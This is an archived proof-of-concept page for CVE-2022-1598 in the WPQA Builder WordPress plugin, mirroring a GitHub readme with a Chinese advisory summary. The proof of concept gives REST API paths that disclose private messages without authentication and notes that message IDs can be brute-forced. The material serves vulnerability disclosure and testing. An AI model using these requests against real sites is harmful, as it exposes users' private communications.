Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-1598 PoC — WordPress plugin WPQA Builder 访问控制错误漏洞

Source
https://github.com/V35HR4J/CVE-2022-1598
Associated Vulnerability
Title:WordPress plugin WPQA Builder 访问控制错误漏洞 (CVE-2022-1598)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin WPQA Builder 5.4之前版本存在访问控制错误漏洞,该漏洞源于在REST API端点中缺乏身份验证。攻击者利用该漏洞查看用户之间发送的私密信息。
Description
WPQA < 5.5 - Unauthenticated Private Message Disclosure
Readme
# CVE-2022-1598
WPQA &lt; 5.5 - Unauthenticated Private Message Disclosure

# Description
The plugin which is a companion to the Discy and Himer themes, lacks authentication in a REST API endpoint, allowing unauthenticated users to discover private questions sent between users on the site.

## Affected Plugins:
[WPQA < 5.5](https://codecanyon.net/item/wpqa-builder-forms-addon-for-wordpress/25298161)

## Affected Themes:
[DISCY](https://2code.info/discy-social-questions-and-answers-wordpress-theme/)

[HIMER](https://2code.info/himer-social-questions-and-answers-wordpress-theme/)

# Proof of Concept

```
Visit /wp-json/wp/v2/asked-question

or /wp-json/wp/v2/asked-question/<iD> (where ID is numeric and can be bruteforced!) 
```

## Nuclei Template:
[CVE-2022-1598.yaml](CVE-2022-1598.yaml)

## VIDEO POC:
https://www.youtube.com/watch?v=MbhiQKWvivQ

### References:
https://wpscan.com/vulnerability/0416ae2f-5670-4080-a88d-3484bb19d8c8

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1598
File Snapshot

 [4.0K]  /data/pocs/4cfc829fbade709c8301fd51beae15fd5d31c633
├── [ 999]  CVE-2022-1598.yaml
└── [1006]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.